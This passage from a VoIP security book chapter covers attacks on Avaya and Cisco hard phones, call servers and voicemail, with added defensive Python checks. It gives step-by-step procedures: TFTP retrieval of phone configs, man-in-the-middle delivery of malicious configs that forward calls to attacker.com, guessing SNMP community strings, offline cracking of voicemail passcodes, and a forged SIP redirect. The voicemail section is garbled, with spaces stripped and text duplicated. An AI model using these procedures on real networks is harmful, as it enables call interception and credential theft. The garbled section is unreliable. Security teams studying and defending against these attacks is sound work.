Most hard phones receive important files, such as boot images or configuration files, over the network. VoIP devices, including those from Cisco and Avaya, often transfer these files using the TFTP protocol, but some also use HTTP. Either way, an attacker can obtain copies of these files quite easily. Both TFTP and HTTP are cleartext protocols that are often used without any authentication. An attacker who has obtained such files has access to the phone's settings, operating features, and options. To obtain such a file, the attacker needs only the TFTP server's IP address and the name of the boot image or configuration file. In order to find the TFTP server's IP address on a Cisco hard phone, for example, the attacker can simply check the display of the phone itself. By choosing the Options menu on the phone and navigating to the network configuration settings, an attacker will find many items displayed, including the TFTP server used on the network as well as the IP address of Cisco CallManager. On an Avaya network, an attacker's sniffing for UDP port 69 will identify the TFTP server. (Because Avaya hard phones get TFTP downloads after reboot, the attacker can simply reboot the phone while sniffing the network.) Once the attacker knows the TFTP server's address, she can simply grab the desired file using the appropriate TFTP or HTTP GET command. For example, 46xxsettings.txt is the configuration file for an Avaya hard phone. By performing a TFTP GET using that filename, an attacker can pull down the configuration file quickly and easily. Because most phones pull an updated configuration file each time they are rebooted, an attacker can be reasonably sure the file he gets from the TFTP server is the most updated version. To obtain a phone's configuration file, an attacker would perform these steps:

1. Connect to the VoIP network, as shown in "Vendor-Specific VoIP Sniffing".
2. Locate the TFTP server used to upload images/configuration files to hard phones.
3. Locate the TFTP server by sniffing the network for the source address from which TFTP connections arrive. A quick search for the 46xxsettings.txt file will help locate packets with the source TFTP server on an Avaya network. For this example, an attacker should assume that the TFTP server is 172.16.1.88.
4. Enter the following at a Windows command prompt:

tftp 172.16.1.88 GET 46xxsettings.txt

By completing these steps, an attacker can easily and anonymously retrieve a phone's configuration file from a TFTP server.
Uploading a Malicious Configuration File

When a hard phone reboots, it often downloads a boot image and a configuration file over the network. These files contain information for the phone settings, including functionality features and options. As discussed in the previous section, the boot image and configuration file are transferred from the network to the hard phone using cleartext protocols. The use of clear-text protocols gives an attacker the ability to introduce her own malicious files into the environment. An attacker who wants to force a hard phone to load a malicious configuration file can perform a simple man-in-the-middle attack. By focusing the attack on Layer 2 of the OSI Networking Model, an attacker can redirect all TFTP/HTTP requests away from the real server to a machine under his control. Once the redirection has been set up, the attacker can push malicious boot images[9] and configuration files[10] to the hard phone. These files will be installed during the phone's boot process, because the entire transaction occurs over cleartext protocols. As a result of the lack of cryptographic protections, the use of cleartext makes it impossible for the hard phone to verify the sending server's identity. After the attacker's boot image and configuration file have been loaded on the hard phone, the attacker is able to control the phone and its features remotely. Only a few phone features are attractive to attackers. In fact, most of the settings on typical hard phones are of little or no interest to attackers. The configuration file typically includes information like which digit to dial to make an outside call and speed dial settings. However, changes to call forwarding, SIP re-registration wait times, and call recording allow an attacker to intercept voice data from her target, sometimes even when the phone is not in use. For example, many hard phones allow users to use the phone as a recording device without placing a phone call or lifting the handset. This means that with the proper malicious configuration file, the hard phone can be set to record audio from the speaker microphone. Table 6-1 shows the settings from an Avaya 4600 service hard phone that, to an attacker, would be most interesting to change and upload to a targeted device.

Table 6-1. Sample Configuration Information for Avaya 4600 Hard Phones

Setting | Description | Attack Potential
SET DNSSRVR 198.152.15.15 | Sets the DNS server for the phone | A fake DNS setting would disrupt name resolution, causing a Denial of Service. The attacker could also redirect a phone to his or her own machine.
SET SYSLANG Katakana | Sets the display language for the phone | An attacker can set the display language to something unknown or rarely used, such as Katakana.
SET CALLFWDSTAT 1 | Permits unconditional call forwarding | An attacker can have all calls forwarded to a specific hard phone. After the call is received, the attacker can then execute a three-way call to the intended target while staying on the line to listen to the conversation.
SET CALLFWDADDR attacker@attacker.com | Sets the destination address for the call forwarding feature | See previous section.
SET REGISTERWAIT 65536 | Sets the time, in seconds, between re-registrations with the current server | An attacker can set the register timeout to the maximum value, allowing for a registration hijack attack on the system (shown in Chapter 2).
SET SIPDOMAIN attacker.com | Sets the domain name to be used during registration | An attacker can set the domain to either a malicious domain server or a fake one, causing traffic to be redirected.
SET SIPREGISTRAR 192.168.0.1 | Sets the IP address or FQDN of the SIP registration server | An attacker can set the Registrar to his or her own malicious server or a fake one, allowing the attacker to redirect calls accordingly.
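Because TFTP and HTTP give the phone no way to authenticate the server, the defender's counterpart to Table 6-1 is to treat the configuration file as untrusted input and check it against a site policy, both on the TFTP server and in copies captured from what phones actually receive. The audit below is an added example, not Avaya's or the book's code. The approved values, the 3600-second REGISTERWAIT limit and both sample files are constructed for the example, and only the SET NAME value lines of the 46xxsettings.txt format are interpreted; comments and other directives are skipped.

```python
import hashlib

# Site policy for one deployment (constructed for the example; adapt per site)
APPROVED = {
    "DNSSRVR": {"198.152.15.15"},
    "SIPDOMAIN": {"voip.example.com"},
    "SIPREGISTRAR": {"10.10.0.5"},
    "SYSLANG": {"English"},
}
MAX_REGISTERWAIT = 3600   # seconds; an assumed site limit, not a vendor default


def parse_settings(text):
    """Return {NAME: value} from 'SET NAME value' lines; comments and other directives are skipped."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 2)
        if len(parts) >= 2 and parts[0].upper() == "SET":
            settings[parts[1].upper()] = parts[2].strip() if len(parts) == 3 else ""
    return settings


def audit(text, approved_sha256=None):
    """Return a list of findings; an empty list means the file matches policy."""
    findings = []
    if approved_sha256 is not None:          # integrity: the transport itself offers none
        digest = hashlib.sha256(text.encode()).hexdigest()
        if digest != approved_sha256:
            findings.append(f"content digest {digest[:12]}... differs from the approved copy")
    s = parse_settings(text)
    for name, allowed in APPROVED.items():   # redirection targets must be known hosts
        for value in s.get(name, "").split(","):
            if value.strip() and value.strip() not in allowed:
                findings.append(f"{name}={value.strip()} is not an approved value")
    if s.get("CALLFWDSTAT", "0") != "0":
        findings.append("CALLFWDSTAT enables call forwarding")
    if s.get("CALLFWDADDR"):
        findings.append(f"CALLFWDADDR directs calls to {s['CALLFWDADDR']}")
    wait = s.get("REGISTERWAIT")
    if wait and (not wait.isdigit() or int(wait) > MAX_REGISTERWAIT):
        findings.append(f"REGISTERWAIT={wait} exceeds the {MAX_REGISTERWAIT}s site limit")
    return findings


# Constructed sample files (not vendor-supplied): the approved copy and a tampered one
APPROVED_FILE = """\
## 46xxsettings.txt - constructed sample for the example
SET DNSSRVR 198.152.15.15
SET SYSLANG English
SET CALLFWDSTAT 0
SET REGISTERWAIT 900
SET SIPDOMAIN voip.example.com
SET SIPREGISTRAR 10.10.0.5
"""
APPROVED_SHA256 = hashlib.sha256(APPROVED_FILE.encode()).hexdigest()

TAMPERED_FILE = """\
SET DNSSRVR 198.152.15.15
SET SYSLANG Katakana
SET CALLFWDSTAT 1
SET CALLFWDADDR attacker@attacker.com
SET REGISTERWAIT 65536
SET SIPDOMAIN attacker.com
SET SIPREGISTRAR 192.168.0.1
"""

if __name__ == "__main__":
    for finding in audit(TAMPERED_FILE, APPROVED_SHA256):
        print(finding)
```

Against the tampered copy the audit reports the digest mismatch plus one finding for each of the six settings from Table 6-1 that were changed; the approved copy produces none. The digest check catches any edit at all, while the per-setting rules explain which change matters and why, which is what an operator needs when a phone's running configuration is captured from the network rather than read from the server.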
To carry out this attack, an attacker would complete the following steps:

1. Connect to the VoIP network, as shown in "Vendor-Specific VoIP Sniffing".
2. Locate the TFTP or HTTP server used to upload boot images and configuration files to hard phones. (The previous section contains detailed information on discovering TFTP servers.)
3. Start a TFTP server on her own machine and ensure that the malicious files 46xxsettings.txt and a01d01b2_3.bin (boot image) are in the root of the TFTP server directory.
4. Unplug the attacking machine from the network, then change the IP address of that machine to the IP address of the TFTP server.
5. Plug the attacking machine back into the network and ignore any IP address conflict errors.
6. Using Cain & Abel on the attacking machine, perform a man-in-the-middle attack, redirecting all traffic destined for the real TFTP server to his own machine, which will have a different MAC address but the same IP address.

Done! While this attack will be intermittent, depending on the location of the real TFTP server, hard phones will now take their image and configuration settings from the malicious source.

Exploiting Weaknesses of SNMP

Like many devices with an operating system, hard phones often enable network services for a variety of management purposes. Specifically, VoIP hard phones often have Simple Network Management Protocol (SNMP) enabled. SNMP is a common method used to manage network devices. SNMP version 1 (SNMPv1) is the most popular version; however, it is also the weakest. SNMPv1 is a cleartext protocol that lets read and write community strings (which are similar to device passwords) traverse the network without encryption. The use of cleartext community strings is obviously a weak security practice. Furthermore, more often than not, the community string that grants read access to the device and its configuration information is set as public. Hence, any device using SNMPv1 can be compromised by either an attacker's guessing a weak read or write community string (such as public or private, respectively) or by an attacker's sniffing the network. Once an attacker has gained SNMP access to a hard phone, she can access the phone's specific configuration settings. This allows her to perform further attacks with advanced information about the device, like the route table of remote devices or the LDAP authentication server. To pull information from a hard phone using SNMP, an attacker would complete the following steps:

1. Download an SNMP tool, such as GetIf, to pull information from SNMP devices. GetIf can be downloaded from http://www.wtcs.org/snmp4tpc/getif.htm/.
2. Open GetIf from the Start Menu (Start ► Programs ► GetIf).
3. Type the IP address of the hard phone in the Hostname text box.
4. In the SNMP Parameters section, enter the SNMP read or write community string. The attacker would leave this as public or private if he has not already sniffed the information over the network.
5. Select the Start button on the bottom right-hand side. (If public is the correct read community string, information will be displayed immediately in the various text boxes.)
6. In order to get the specific configuration information from the hard phone, select the MBrowser tab.
7. Select Start.

The specific configuration information stored in SNMP files will be displayed in the MBrowser tab. The attacker can simply expand the + symbols to look for specific information, as shown in Figure 6-2.

Figure 6-2. SNMP files from hard phones

[9] a01d01b2_3.bin on Avaya hard phones
[10] 46xxsettings.txt for Avaya hard phones
Cisco CallManager and Avaya Call Center

Cisco CallManager and Avaya Call Center/Server are products that handle calls to and from VoIP hard phones. While the Cisco and Avaya products might be popular products for enterprise VoIP networks, open source software such as Asterisk can also be used (if standard protocols such as SIP, H.323, RTP, and/or IAX have been implemented). Any server's insecure use of SIP, H.323, RTP, and/or IAX is of primary concern when using VoIP. For example, the authentication method for SIP is a strong security concern, regardless of whether SIP has been enabled on Avaya, Cisco, or even Asterisk. Nonetheless, both Cisco's and Avaya's products have a slew of insecure services running, such as TFTP, FTP, SNMP, telnet, and HTTP, that should be disabled immediately. Furthermore, more secure services, such as SSH, are not updated often, so existing services may be vulnerable to dated security attacks. This section will review common infrastructure security issues on network services, including, but not limited to, VoIP software and devices. Table 6-2 lists commonly used insecure services, recommendations for mitigating vulnerability, and the best open source tool for testing the issue.

Table 6-2. Insecure Services Used with VoIP, Mitigation Recommendations, and Testing Tools

Services | Recommendation | Tool
FTP | Disable cleartext management protocols in favor of encrypted communication with two-factor authentication | Nmap, Nessus
telnet | Implement SSH with two-factor authentication | Nmap, Nessus
Outdated OpenSSH | Ensure all SSH servers are up to date and fully patched | Nmap, Nessus
Outdated OpenSSL | Ensure SSL libraries are up to date and fully patched | Nmap, Nessus, Nikto
Outdated Apache Build | Ensure all web servers are up to date and fully patched | Nmap, Nessus, Nikto
Certificates | All SSL certificates should be current and up to date. Ensure that the SSL certificate is not self-signed and is for the correct host (do not use the default cert across all VoIP endpoints). | Nmap, Nessus, Nikto
SNMP | Enable SNMPv3 with complex and unique community strings | GetIf, Nessus
Logging | Enable logging options on media gateways | N/A

As mentioned previously, the best way to check for these network issues is by using Nmap (http://www.insecure.org/), Nikto (http://www.cirt.net/), or Nessus (http://www.nessus.org/). These three open source tools will show which ports are open, which web application defaults are exposed, and which network services are vulnerable. A combination of these three tools on any Cisco or Avaya VoIP application/appliance can uncover any of the vulnerabilities listed in Table 6-2 and much more.
Using Nmap to Scan VoIP Devices

Nmap is the industry's most popular and most supported port scanner. By port scanning any VoIP device, a user can see if vulnerable ports and services have been enabled. For example, if TCP ports 21 (FTP), 23 (telnet), and 80 (HTTP) or UDP ports 69 (TFTP) or 161 (SNMP) appear, the attacker will have a few avenues for attack. Using these services for management will expose administrative passwords over the network in cleartext, allowing a simple man-in-the-middle attack to compromise the devices and any hard phones registered to a VoIP device. To analyze a Cisco or Avaya VoIP application/appliance with Nmap, an attacker would complete the following steps:

1. Download Nmap from http://www.insecure.org/.
2. Once Nmap has been installed, enter the following at a command prompt to enumerate any/all ports exposed on the device (where 172.16.11.08 is the IP address of the Cisco CallManager or Avaya Call Center/Server):

nmap -sT -P0 -p 1-65535 172.16.11.08

Figure 6-3 shows the example result after port-scanning an Avaya Communication Manager device.

Figure 6-3. Port scan results on Avaya Communication Manager
Scanning Web Management Interfaces with Nikto

Nikto is the industry's most popular CGI scanner for web applications. By scanning the files and services on VoIP web management interfaces over HTTP, an attacker can see what default pages or vulnerable attacks are enabled on the system. If default Apache pages are loaded or if directory browsing is allowed by the web server, the system could be vulnerable to attack. Managing VoIP products using a web interface can allow simple CGI, directory traversal, and forced browsing attacks to grant unauthorized users access to the system and any hard phones registered to it. To run Nikto against a Cisco or Avaya VoIP application/appliance, an attacker would complete the following steps:

1. Download Nikto from http://www.cirt.net/.
2. Once Nikto has been installed, enter the following at a command prompt (where 172.16.11.08 is the IP address of the Cisco CallManager or Avaya Call Center/Server):

nikto.pl -host 172.16.11.08

3. Review the output to discover any and all vulnerable web server settings.

Discovering Vulnerable Services with Nessus

Nessus is another popular scanner for security vulnerabilities. Unlike Nmap, which performs port scanning only, Nessus will also look for vulnerable services running on the device. And unlike Nikto, Nessus will scan all ports on a machine, including TFTP, SNMP, FTP, SSH, and the like. During the scan, Nessus searches for vulnerability issues, outdated services, and security exploits. To scan a Cisco or Avaya VoIP application/appliance using Nessus, an attacker would complete the following steps:

1. Download Nessus from http://www.nessus.org/.
2. Install the application based on the setup instructions.
3. Once installation is complete, open a Nessus client like NessusClient (http://www.nessus.org/download/index.php/) and connect to the Nessus server.
4. Once connected to the Nessus server, type the IP address of the Cisco CallManager or Avaya Communication Manager system. After the scan is complete, the Nessus report will show all vulnerable services or security exploits on the existing system.
ModularMessagingVoicemailSystemModularMessagingisavoicemailapplicationfromAvaya.TheapplicationintegrateswithAvaya'sVoIPdevices,allowinguserstologintoawebapplicationandchecktheirvoicemail.Inadditiontothewebapplication,ModularMessagingcanalsointegratewithMicrosoftOutlook,allowinguserstoimporttheirvoicemailsintoOutlook.AspecialOutlookplug-in,whichwillshowan"AvayaInbox"folderinauser'sOutlookclientaftertheplug-inhasbeeninstalled,isrequiredforthisfeature.Onceithasbeeninstalled,allvoicemailswillappearinOutlookunderthisnewlycreatedfolderassoundfiles.Unfortunately,ModularMessaginghasafewsecurityissuesthatthreatentheprivacyofuservoicemailmessages.Thefirstissueisthewebapplication'sdatavalidationmethods,whichcouldleadtosevereSQLinjectionandcross-sitescriptingvulnerabilities.Theapplication'sspecificsecurityflawsarebeyondthescopeofthisbook;however,thewebapplicationhasalotofroomforimprovementwhenitcomestosecureinputhandling.ThesecondaspectofModularMessaging,theOutlookplug-infeature,alsopresentssecurityissues.Theseissuesallowuserstocompromiseotherusers'voicemailboxes.Theplug-inrequiresauthenticationbetweentheModularMessagingserverandauser'sOutlookclient.TraditionalOutlookNTLMv1/v2orKerberosauthenticationisusuallywrappedwithSSL.However,theAvayaOutlookplug-inusesaweakchallenge/responsemethodoftenusedinSMTPorIMAPauthentication,knownasChallengeResponseAuthenticationMechanism(CRAM-MD5).WithAvaya'sModularMessagingserver,theCRAM-MD5hashiscreatedfromtheenduser'spasscodeandchallenge.ThechallengegivenbytheModularMessagingserverisBase64encoded,whichofferslittletonoprotectionbecauseitistrivialtoreverseusingahandfulofprograms.Furthermore,the
attackisevenmoretrivialthanmostofflinebrute-forceattacksbecauseavoicemailpasscodeusuallyconsistsofonly4numericfields.Becauseallcommunicationbetweentheuser'sOutlookclientandtheModularMessagingserverusescleartextprotocols,ausercansniffthechallenge,reversetheBase64encoding,andperformanofflinedictionaryattacktoretrievethevoicemailpasscodeforallvoicemailboxesonthesystem.Becausethepasscodeconsistsofonly4numericfields,theattackrequiresonly10,000attempts(0to9,999).TheseattemptscanbemadeinaboutfivesecondsonaPentium4processor.Onlywhenthepasscodeconsistsof14charactersdoesittakeconsiderablylongertocrack.Inordertocompletethisattack,amaliciousinsidermustpassivelysniffthenetworkandgainaccesstoallauthenticationattemptsfromtheOutlookclientandtheModularMessagingserver.(Note:Switchednetworksdonotpreventsniffingattacks.)Onceanattackerisabletosniffthenetwork,sheneedsonlytocapturetwoofthethreeitemsrequiredtocracktheaccountsoffline,includingthechallengeandtheresultingCRAM-MD5hash.BoththeCRAM-MD5hashandthechallengearesentoverthenetworkincleartext,allowingtheequationbelowtobetheattacker'srecipeforsuccess.Itemsinboldherearesniffedoverthenetworkanditemsinbolditalicarebrute-forced:
CRAM-MD5=Passcode+Challenge-CRAM-MD5=Ac2158a7d4c2287874d485501d67d807-Challenge=3458074250.7565974@mmlab2mss01lnx-Passcode=??????????495278A176DA26D72149954E06792CB7=MD5(0001+3458074250.7565974@mmlab2mss01lnx)1E6E2D30C84331475EB94D14BEAD1351=MD5(0002+3458074250.7565974@mmlab2mss01lnx)ADDD6C5A96E0545D75DC03270B40BAAF=MD5(0003+3458074250.7565974@mmlab2mss01lnx)9CDAB50A50CBD26A8511C3CAE6302701=MD5(0004+3458074250.7565974@mmlab2mss01lnx)AD7827249D7A704857161DFADCAE0A69=MD5(0005+3458074250.7565974@mmlab2mss01lnx)...AutomaticallyContinued...Ac2158a7d4c2287874d485501d67d807==MD5(2006+3458074250.7565974@mmlab2mss01lnx)-Match!!
Notethelastrowintheattackprocess,wheretheresultoftheguessedpasscodeof2006andthechallengeof3458074250.7565974@mmlab2mss01lnxisAc2158a7d4c2287874d485501d67d807.Thisisthesamevalue
Ac2158a7d4c2287874d485501d67d807.Thisisthesamevaluethatwassniffedoverthenetwork.Hence,theattackercanconcludethattheuser'svoicemailpasscodeis2006.InordertopreventauthenticationattacksonModularMessaging,useSSLwithLDAPtokeepattackersfromsniffingtheauthenticationcommunication.Alternatively,alongerPINcouldalsoberequired;however,thesizerequiredtopreventcrackingofthePINbecomesquitelarge(14),asshownhere:4numericfields:Lessthan1minute6numericfields:Lessthan1minute8numericfields:4minutes10numericfields:7hours12numericfields:32days14numericfields:7years16numericfields:700yearsTocompromiseauser'svoicemailpasscodeusingtheOutlookModularMessagingplug-in,anattackerwouldcompletethefollowingsteps:
1. Perform a man-in-the-middle attack using Cain & Abel. See "Using Cain & Abel for Man-in-the-Middle Attacks" for more details.
2. Once a user checks voicemail via the Avaya Outlook plug-in, select the Sniffer tab on the top row.
3. Select the Passwords tab on the bottom row.
4. Highlight SMTP on the left pane (see Figure 6-4).
Figure 6-4. Captured challenges and CRAM-MD5 hashes from Avaya Modular Messaging server
5. Once the challenges and hashes have been captured, highlight the row that is to be cracked, as shown in Figure 6-4, where the second row is highlighted.
6. Right-click the row and select Send to Cracker.
7. Select the Cracker tab on the top row. The hash and challenge that were just exported from the Passwords tab should appear.
8. Highlight the row, then right-click and select Brute-force attack.
9. Click the Start button, and within a few seconds, Cain & Abel will have carried out a brute-force attack on the passcode, which is 2006 (see Figure 6-5).
Figure 6-5. Compromised password from carrying out a brute-force attack on CRAM-MD5 hashes from Avaya Modular Messaging server
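The following Python example is added here to make the two defensive points of this section concrete; it is not code from the book. It computes the real CRAM-MD5 response as defined in RFC 2195 (HMAC-MD5 keyed with the secret, which differs from the MD5(passcode + challenge) sketch above but has the same tiny search space when the secret is a short PIN), puts the page's passcode-length table on a footing a policy reviewer can reproduce, and flags the exact condition that makes the offline attack possible: an AUTH CRAM-MD5 exchange on an SMTP session that never negotiated STARTTLS. The challenge string is the one shown above; the session transcript, the user name "user1", and the guess rate derived from the table are constructed assumptions.

```python
import base64
import hashlib
import hmac

# Constructed sample values: the challenge string is the one shown in the
# text, the secret is the four-digit passcode the text recovers (2006).
SAMPLE_CHALLENGE = "<3458074250.7565974@mmlab2mss01lnx>"
SAMPLE_SECRET = "2006"

# Guess rate implied by the text's own table (8 digits in about 4 minutes):
# 10**8 / 240 s, roughly 417,000 guesses per second. An estimate, not a
# measurement.
TABLE_GUESS_RATE = 10 ** 8 / 240


def cram_md5_response(secret: str, challenge: str) -> str:
    """Client-side CRAM-MD5 digest as defined in RFC 2195: HMAC-MD5 keyed
    with the shared secret over the server challenge, as lowercase hex."""
    return hmac.new(secret.encode(), challenge.encode(), hashlib.md5).hexdigest()


def verify_cram_md5(stored_secret: str, challenge: str, presented: str) -> bool:
    """Server-side check, done in constant time so the comparison itself
    does not leak how many digest bytes matched."""
    expected = cram_md5_response(stored_secret, challenge)
    return hmac.compare_digest(expected, presented.strip().lower())


def exhaustive_search_seconds(pin_digits: int, guesses_per_second: float) -> float:
    """Worst-case time to try every numeric passcode of the given length."""
    return 10 ** pin_digits / guesses_per_second


def auth_without_tls(session_lines) -> bool:
    """True when AUTH CRAM-MD5 is attempted on a session that has not run
    STARTTLS first. Lines are 'C: ...' / 'S: ...' as a sniffer would log
    them; the challenge and digest on such a session are visible to anyone
    on the path, which is what the offline attack in the text relies on."""
    tls_started = False
    for line in session_lines:
        side, _, text = line.partition(": ")
        if side == "C" and text.upper().startswith("STARTTLS"):
            tls_started = True  # everything after this point is encrypted
        if side == "C" and text.upper().startswith("AUTH CRAM-MD5") and not tls_started:
            return True
    return False


def constructed_session(with_starttls: bool):
    """Build a constructed SMTP transcript shaped like the Outlook/Modular
    Messaging exchange described in the text (user name is made up)."""
    challenge_b64 = base64.b64encode(SAMPLE_CHALLENGE.encode()).decode()
    digest = cram_md5_response(SAMPLE_SECRET, SAMPLE_CHALLENGE)
    response_b64 = base64.b64encode(f"user1 {digest}".encode()).decode()
    lines = ["S: 220 mmlab2mss01lnx ESMTP", "C: EHLO outlook-client",
             "S: 250-AUTH CRAM-MD5"]
    if with_starttls:
        lines += ["C: STARTTLS", "S: 220 Ready to start TLS"]
    lines += ["C: AUTH CRAM-MD5", f"S: 334 {challenge_b64}", f"C: {response_b64}"]
    return lines


if __name__ == "__main__":
    for digits in (4, 6, 8, 10, 12, 14, 16):
        secs = exhaustive_search_seconds(digits, TABLE_GUESS_RATE)
        print(f"{digits:2d} digits: {secs / 86400:12.1f} days to exhaust")
    print("cleartext auth seen:", auth_without_tls(constructed_session(False)))
```

The transcript check is the kind of rule that belongs in a network sensor watching the voicemail server's SMTP port: an AUTH line before any STARTTLS is the observable symptom of the configuration this section warns about, and it is far cheaper to alert on than to detect the later offline cracking, which leaves no trace on the wire.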
Infrastructure Server Impersonation

Moving beyond attacks against infrastructure systems, attacks impersonating infrastructure VoIP devices are a bit more interesting. An attacker's ability to spoof a legitimate gatekeeper, Registrar, Proxy server, or any other VoIP authentication entity can be quite harmful. This section describes the use of a fake infrastructure system to gain access to a user's VoIP credentials, eavesdrop on the user's calls, or redirect a call's destination. The VoIP entities we will discuss are:

Spoofing SIP Proxies and Registrars
Redirecting H.323 gatekeepers
Spoofing SIP Proxies and Registrars
Many spoofing attacks against VoIP networks that use SIP are possible, including the ability to spoof infrastructure systems such as SIP Proxy servers and SIP Registrars. During a SIP INVITE request, a SIP client sends a SIP Proxy server or Registrar an INVITE packet. Before the legitimate server can respond, an attacker can submit a forged response that appears to be from the real domain but that has a different IP address, thereby redirecting the User Agent to a SIP Proxy server or Registrar controlled by the attacker. For example, if a SIP User Agent tried to contact eNapkin (http://www.enapkin.com/) with the contact address 172.16.1.100, an attacker could forge a response from eNapkin with the contact address of 172.16.1.150, which is a SIP Proxy/Registrar that the attacker controls. When the legitimate User Agent wishes to call users in eNapkin, the attacker can redirect calls to any SIP client of his choosing. In this scenario, an attacker could redirect calls to a client he controls as well as the legitimate client for the call, allowing the attacker to listen to all calls to or from their target. The spoofed SIP packet from the attacker would look similar to the following (notice the Contact line, where the IP address of the attacker is listed):
SIP/2.0 302 Moved Temporarily
To: <sip:Sonia@172.16.1.100>
From: <sip:Raina@172.16.1.100>;tag=1108
Call-Id: 11082006@172.16.1.100
CSeq: 1 INVITE
Contact: <sip:attacker@172.16.1.150>
Once the User Agent receives the spoofed packet, it will attempt to contact the SIP Proxy server on the address specified in the Contact field. The User Agent will then be communicating with the fake SIP Proxy server or Registrar, thus allowing the attacker to control the User Agent's communication path.
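A User Agent or a monitoring sensor can catch this redirect because the forged 302 carries the attacker's address in plain view. The following Python example is added here and is not from the book: it parses a SIP response, pulls the host out of every Contact URI, and raises an alert when a 3xx redirect points anywhere other than the organization's known proxies. The message is the one shown above; the trusted-proxy set (172.16.1.100 only) and the companion 302 and 200 messages are constructed for the example.

```python
import re

# Constructed sample: the forged 302 shown in the text, sending the User
# Agent to 172.16.1.150.
SPOOFED_302 = (
    "SIP/2.0 302 Moved Temporarily\r\n"
    "To: <sip:Sonia@172.16.1.100>\r\n"
    "From: <sip:Raina@172.16.1.100>;tag=1108\r\n"
    "Call-Id: 11082006@172.16.1.100\r\n"
    "CSeq: 1 INVITE\r\n"
    "Contact: <sip:attacker@172.16.1.150>\r\n"
    "\r\n"
)

# A redirect that stays inside the known proxy set (constructed).
LEGIT_302 = SPOOFED_302.replace("attacker@172.16.1.150", "Sonia@172.16.1.100")

# A normal final response that is not a redirect at all (constructed).
OK_200 = "SIP/2.0 200 OK\r\nCSeq: 1 INVITE\r\nContact: <sip:Sonia@172.16.1.100>\r\n\r\n"

# Hosts the enterprise's own SIP proxies and registrars are known to use
# (assumed value for this example).
TRUSTED_PROXIES = {"172.16.1.100"}

# Host part of a sip:/sips: URI, with an optional user@ prefix and an
# optional port or parameters after it.
_URI_HOST = re.compile(r"<?sips?:(?:[^@>]+@)?([^;:>\s]+)", re.IGNORECASE)


def parse_sip_response(raw: str):
    """Return (status_code, headers) where headers maps the lowercased
    header name to the list of values seen, in order."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    parts = lines[0].split(" ", 2)
    if len(parts) < 2 or not parts[0].upper().startswith("SIP/"):
        raise ValueError("not a SIP response")
    status = int(parts[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers


def contact_hosts(headers):
    """Every host named in a Contact header (there may be several)."""
    hosts = []
    for value in headers.get("contact", []):
        for part in value.split(","):
            match = _URI_HOST.search(part)
            if match:
                hosts.append(match.group(1).lower())
    return hosts


def redirect_alert(raw: str, trusted_hosts):
    """A reason string if the message is a 3xx redirect whose Contact points
    outside the trusted proxy set; None for anything benign."""
    status, headers = parse_sip_response(raw)
    if not 300 <= status < 400:
        return None
    call_id = headers.get("call-id", ["?"])[0]
    for host in contact_hosts(headers):
        if host not in trusted_hosts:
            return f"{status} redirect to untrusted host {host} (Call-ID {call_id})"
    return None


if __name__ == "__main__":
    for name, msg in (("spoofed", SPOOFED_302), ("legit", LEGIT_302), ("ok", OK_200)):
        print(name, "->", redirect_alert(msg, TRUSTED_PROXIES))
```

In a production sensor the trusted set would be fed from the SIP configuration rather than hard-coded, and the same check applies to the Contact and Via headers of REGISTER responses, which is where a forged Registrar would show up.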
Redirecting H.323 Gatekeepers
H.323 gatekeepers can also be redirected pretty simply, depending on the implementation. If an H.323 endpoint does not have a static gatekeeper set, it searches for one by sending a Gatekeeper Request (GRQ) packet over the network to 224.0.1.41 on port 1718.[11] Each H.323 endpoint will use this address to find the local gatekeeper on the network. The trick here for the attacker is to respond to the packet first and tell the H.323 endpoint to register to a gatekeeper under her control. The Gatekeeper Confirmation (GCF) packet sent by the attacker can force H.323 endpoints to route all their calls, both cleartext and encrypted, through a malicious intermediary. Alternatively, to ensure that the call is completed properly, the malicious gatekeeper can point to the legitimate gatekeeper on the network, ensuring that all calls are actually routed. Once the H.323 endpoint agent receives the GCF packet, the endpoint will then be communicating with the attacker's gatekeeper, thus allowing the attacker to control the voice communication path. In many situations, a static IP address will be entered for an endpoint's gatekeeper; however, that still does not prevent the redirection attack. Even if an endpoint does not send a discovery packet to 224.0.1.41, an attacker can still update the endpoint's gatekeeper information with malicious data. In order to perform this attack, an attacker can monitor the network and wait until the endpoint is rebooted or simply force a reboot by performing a DoS attack on the endpoint. When an endpoint begins the boot process, it looks for its statically entered gatekeeper address. At this time, an attacker can override the static entry with its forged GCF response, containing its own gatekeeper information. Much as in the previous situation, the GCF packet sent by the attacker will force the H.323 endpoint to update its gatekeeper information. Thus, while a statically entered gatekeeper address has been used on the network, the endpoint will still override that information if a GCF packet is received from the network with new information. Once the new information is received, the data in the GCF packet will be used by the endpoint. It should be noted that the attacker's GCF packet must reach the endpoints before the legitimate gatekeeper's GCF packet, which means that timing and proximity are key requirements if such an attack is to be successful. This allows an attacker to control the voice communication path of H.323 endpoints.
[11] 224.0.1.41 is a reserved Class D multicast address for gatekeeper discovery.
Summary

VoIP infrastructure systems are the backbone of voice communication. H.323 endpoints and SIP User Agents rely on these systems to ensure that calls are managed properly and securely. This chapter showed how VoIP software and hardware appliances can be attacked and/or abused similarly to the way any other technology with a TCP/IP stack can be attacked and/or abused. For example, a vulnerable Cisco router running TFTP is not much different from a vulnerable Cisco/Avaya hard phone running TFTP. Both devices are vulnerable to all attacks that fall under the TFTP umbrella. Whether it is a hard phone or Cisco/Avaya Call Manager software, each service running on these systems needs to be secured. Advanced applications using VoIP technology, such as voicemail applications, need to be hardened also. The assumption of privacy on voice calls carries over to voicemails; therefore, the argument of treating email, which most people know is not 100 percent private, similarly to voicemail, which is also not 100 percent private, but is assumed to be, does not apply well. While weak voicemail passwords have not generally had a direct effect on privacy, VoIP changes that situation as brute-force attacks on four-digit voicemail passwords can be carried out offline in a matter of minutes. Lastly, critical VoIP infrastructure systems, such as SIP Registrars, SIP Proxy servers, and H.323 gatekeepers, can all be easily spoofed. An attacker's spoofing these entities, which are often responsible for authentication, will spell bad news for the network and its users. Hence, there is a strong need for VoIP infrastructure software and hardware to be secured, along with the protocols they use. If VoIP is going to provide any security guarantees to its users and customers, it must reside on an infrastructure that can be regarded as secure. Attackers who are bored with all the attacks on SIP and H.323 may find it easier simply to attack the VoIP backbone components to have a greater impact on the system. The development of an infrastructure that is immune to users' sniffing on the network or security attacks on TFTP, DNS, and DHCP is desperately needed. VoIP software vendors need to consider their products as a database of sensitive data in the audio format (rather than the file format used by 